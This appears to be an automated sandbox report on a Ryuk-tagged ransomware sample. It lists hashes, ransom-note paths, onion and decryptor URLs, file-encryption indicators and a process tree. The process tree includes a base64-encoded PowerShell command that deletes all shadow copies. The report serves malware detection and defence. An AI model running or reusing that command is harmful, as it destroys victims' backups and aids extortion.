Analysis
-
max time kernel
183s -
max time network
189s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-01-2022 01:16
Static task
static1
Behavioral task
behavioral1
Sample
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe
Resource
win10-en-20211208
General
-
Target
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe
-
Size
164KB
-
MD5
6bbb8d6df3fd7439c39a41e56c0fcd1f
-
SHA1
a02865ffa7434d0ea903323677588729c5d6989f
-
SHA256
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612
-
SHA512
82e97dff15e48ab3b7dad80e557d08574b223f5875cb08ab445d8de64b6b3941ffc4e35c1d4ab5271bf9248ce72b708c175fb52426c9d99022969855f37459f4
Malware Config
Extracted
C:\q8280v5-readme.txt
ryuk
https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ED2FBA3EEAFCE1F7
http://decryptor.top/ED2FBA3EEAFCE1F7
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exedescription ioc process File renamed C:\Users\Admin\Pictures\AssertStop.tiff => \??\c:\users\admin\pictures\AssertStop.tiff.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File renamed C:\Users\Admin\Pictures\CompareAdd.tiff => \??\c:\users\admin\pictures\CompareAdd.tiff.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File renamed C:\Users\Admin\Pictures\HideTrace.tif => \??\c:\users\admin\pictures\HideTrace.tif.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File renamed C:\Users\Admin\Pictures\RequestEnable.tif => \??\c:\users\admin\pictures\RequestEnable.tif.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\users\admin\pictures\AssertStop.tiff b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\users\admin\pictures\CompareAdd.tiff b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File renamed C:\Users\Admin\Pictures\AddResolve.crw => \??\c:\users\admin\pictures\AddResolve.crw.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File renamed C:\Users\Admin\Pictures\CompleteConvertFrom.raw => \??\c:\users\admin\pictures\CompleteConvertFrom.raw.q8280v5 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exedescription ioc process File opened (read-only) \??\I: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\J: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\L: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\M: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\S: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\E: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\H: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\Q: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\R: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\W: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\Y: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\Z: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\D: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\F: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\N: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\K: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\O: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\T: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\V: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\A: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\B: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\U: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\X: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\G: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened (read-only) \??\P: b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\nqlh.bmp" b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe -
Drops file in Program Files directory 31 IoCs
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exedescription ioc process File created \??\c:\program files\q8280v5-readme.txt b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File created \??\c:\program files (x86)\q8280v5-readme.txt b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\PopMove.dib b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ReadCopy.wdp b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\TraceOut.wax b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ApproveWrite.html b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\CompleteAdd.wmv b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ConfirmEdit.htm b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\DisconnectCompare.xml b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ResolveResize.eprtx b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\UnpublishJoin.gif b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\UseNew.3gp b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\NewOptimize.emz b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ProtectSearch.wm b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\RestartMount.emf b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\RevokeExpand.scf b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\WritePing.wav b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\DisconnectUninstall.xltx b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\OpenCopy.m1v b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ProtectResolve.dot b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ProtectUse.M2TS b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\UnpublishStop.html b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\DisableSkip.js b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\DisconnectNew.mhtml b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ProtectGrant.wpl b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\ApproveRedo.odp b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\StepAdd.htm b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\InvokeGroup.DVR b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\RemoveSuspend.odt b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\RequestProtect.htm b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe File opened for modification \??\c:\program files\WriteRequest.fon b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exepowershell.exepid process 1436 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe 1436 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe 2036 powershell.exe 2036 powershell.exe 2036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2036 powershell.exe Token: SeBackupPrivilege 3488 vssvc.exe Token: SeRestorePrivilege 3488 vssvc.exe Token: SeAuditPrivilege 3488 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exedescription pid process target process PID 1436 wrote to memory of 2036 1436 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe powershell.exe PID 1436 wrote to memory of 2036 1436 b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe"C:\Users\Admin\AppData\Local\Temp\b313426ba7ef3c6f0813b4c5d9a07d5ce90a2313d407def386ccf242a9e49612.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1628
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3488